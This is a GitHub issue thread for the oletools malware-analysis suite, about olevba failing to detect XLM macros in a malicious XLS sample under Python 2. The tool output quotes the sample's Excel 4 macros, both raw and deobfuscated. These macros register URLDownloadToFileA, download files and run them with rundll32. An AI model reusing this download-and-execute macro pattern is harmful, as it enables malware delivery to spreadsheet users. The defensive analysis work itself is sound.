oletools icon indicating copy to clipboard operation
oletools copied to clipboard

Published 20 hours ago verified publisher icon decalage2

OLEVBA do not show xls macro while OLEID indicate it exist

Open randubin opened this issue 2 years ago • 5 comments

Affected tool: olevba version 0.6 (latest) Describe the bug OLEVBA failed to show and detect the macro inside XLS file. While OleId do indicate that.

FILE: 062d8e8c3de4faeb07f686514dbb8f9d.xls
Type: OLE
ERROR    Error when running XLMMacroDeobfuscator
ERROR    Error when running oledump.plugin_biff, please report to https://github.com/decalage2/oletools/issues
Traceback (most recent call last):
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/olevba.py", line 3453, in _extract_xlm_plugin_biff
    self.xlm_macros = biff_plugin.Analyze()
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 5320, in Analyze
    parsedExpression, stack = ParseExpression(expression, definesNames, sheetNames, options.cellrefformat)
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 1263, in ParseExpression
    cellref, expression = ParseLoc(expression, cellrefformat, True)
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 212, in ParseLoc
    row, column = struct.unpack(formatcodes, expression[0:formatsize])
struct.error: unpack requires a buffer of 4 bytes
**No VBA or XLM macros found.**

File/Malware sample to reproduce the bug Link: https://bazaar.abuse.ch/sample/2eb56d46618b75f2cd45197602d9c8e8c2fe63fd61fe25780d11f5e13a45959f/ sha256: 2eb56d46618b75f2cd45197602d9c8e8c2fe63fd61fe25780d11f5e13a45959f

OleId: image

OleId How To Reproduce the bug regular run of oleid and olevba. Expected behavior olevba macro detected.

Console output / Screenshots If applicable, add screenshots to help explain your problem. Use the option "-l debug" to add debugging information, if possible.

Version information:

  • OS: Mac
  • OS version: x.xx - 32/64 bits
  • Python version:3.8.8 - 64 bits
  • oletools version: 0.6

Additional context no need.

randubin avatar Feb 16 '22 08:02 randubin

I can see this problem was solved in version oletools-0.60.1.dev6. Sorry.

randubin avatar Feb 16 '22 09:02 randubin

Sorry for python 3.8.8 it works with the latest version. For python 2.7.18 with the latest oletools ( 0.60.1.dev6 ) OleId and olevba do not detect the macro. Python 2.7.18:

Type: OLE
ERROR    Error when running oledump.plugin_biff, please report to https://github.com/decalage2/oletools/issues
Traceback (most recent call last):
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/olevba.py", line 3454, in _extract_xlm_plugin_biff
    self.xlm_macros = biff_plugin.Analyze()
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 5320, in Analyze
    parsedExpression, stack = ParseExpression(expression, definesNames, sheetNames, options.cellrefformat)
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 1263, in ParseExpression
    cellref, expression = ParseLoc(expression, cellrefformat, True)
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 212, in ParseLoc
    row, column = struct.unpack(formatcodes, expression[0:formatsize])
error: unpack requires a string argument of length 4
No VBA or XLM macros found.

Python 3.8.8:

Type: OLE
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt 
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: DocuSign., Macrosheet
' CELL:E178, =EXEC((('Bob'!L39&" ")&'Bob'!J39)&'Bob'!L41), 0
' CELL:D181, =Kopaters(0.0,('Bob'!J43&C191)&C185,'Bob'!J39&"2",0.0,0.0), 29
' CELL:D183, =Kopaters(0.0,('Bob'!J43&C193)&C185,'Bob'!J39&"4",0.0,0.0), 29
' CELL:E182, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"4")&'Bob'!L41), 0
' CELL:E180, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"2")&'Bob'!L41), 0
' CELL:D185, =Kopaters(0.0,('Bob'!J43&C195)&C185,'Bob'!J39&"6",0.0,0.0), 29
' CELL:E184, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"6")&'Bob'!L41), 0
' CELL:D178, =REGISTER((((('Bob'!H39&'Bob'!H40)&'Bob'!H41)&'Bob'!H42)&'Bob'!H43)&'Bob'!H44,(((((((((('Bob'!I39&'Bob'!I40)&'Bob'!I41)&'Bob'!I42)&'Bob'!I43)&'Bob'!I44)&'Bob'!I45)&'Bob'!I46)&'Bob'!I47)&'Bob'!I48)&'Bob'!I49)&"ToFileA","JJCCBB","Kopaters",,1.0,9.0), 0
' CELL:E186, =HALT(), 0
' CELL:D182, =Kopaters(0.0,('Bob'!J43&C192)&C185,'Bob'!J39&"3",0.0,0.0), 29
' CELL:D180, =Kopaters(0.0,('Bob'!J43&C190)&C185,'Bob'!J39&"1",0.0,0.0), 29
' CELL:A180, =GOTO(D178), 0
' CELL:E179, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"1")&'Bob'!L41), 0
' CELL:D184, =Kopaters(0.0,('Bob'!J43&C194)&C185,'Bob'!J39&"5",0.0,0.0), 29
' CELL:C185, =<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&".jpg", 3118268.jpg
' CELL:E181, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"3")&'Bob'!L41), 0
' CELL:E183, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"5")&'Bob'!L41), 0
' CELL:D188, =GOTO(E178), 42
' CELL:D179, =D184, 0.0
...
..
' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' EMULATION - DEOBFUSCATED EXCEL4/XLM MACRO FORMULAS:
' CELL:A180      , FullEvaluation      , GOTO(D178)
' CELL:D178      , FullEvaluation      , =REGISTER("URLMon","URLDownloadToFileA","JJCCBB","Kopaters",1,9)
' CELL:D179      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss5",0,0)
' CELL:D180      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss1",0,0)
' CELL:D181      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"=<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss2",0,0)
' CELL:D182      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss3",0,0)
' CELL:D183      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"=<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss4",0,0)
' CELL:D184      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss5",0,0)
' CELL:D185      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss6",0,0)
' CELL:D188      , FullEvaluation      , GOTO(E178)
' CELL:E178      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss,DllRegisterServer")
' CELL:E179      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss1,DllRegisterServer")
' CELL:E180      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss2,DllRegisterServer")
' CELL:E181      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss3,DllRegisterServer")
' CELL:E182      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss4,DllRegisterServer")
' CELL:E183      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss5,DllRegisterServer")
' CELL:E184      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss6,DllRegisterServer")
' CELL:E186      , End                 , HALT()
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|URLDownloadToFileA  |May download files from the Internet         |
|Suspicious|EXEC                |May run an executable file or a system       |
|          |                    |command using Excel 4 Macros (XLM/XLF)       |
|Suspicious|REGISTER            |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
...
...
...
|Suspicious|XLM macro           |XLM macro found. It may contain malicious    |
|          |                    |code                                         |
+----------+----------------

randubin avatar Feb 16 '22 12:02 randubin

I see that on Python 3 you have XLMMacroDeobfuscator installed, so it works well. But on Python 2 it is not installed, so olevba falls back to plugin_biff instead, and it triggers an exception when parsing the macro. If you install XLMMacroDeobfuscator on python 2 it should work: could you please try? You can do it by running pip2 install -U oletools[full]

decalage2 avatar Mar 12 '22 22:03 decalage2

It seems that XLMMacroDeobfuscator doesn't support python 2, only >3.4. I tried to install it with 'full', but I. am getting the following error: ERROR: Could not find a version that satisfies the requirement complete (from versions: none) ERROR: No matching distribution found for full When Installing XLMMacroDeobfuscator directly, I am getting: ERROR: Package 'XLMMacroDeobfuscator' requires a different Python: 2.7.18 not in '>=3.4' Thanks for the help!

randubin avatar Mar 14 '22 07:03 randubin

OK, good catch. Then I need to adapt the setup script for python 2. And to improve error handling when executing plugin_biff + check why oleid reports macros and not olevba.

decalage2 avatar Mar 14 '22 09:03 decalage2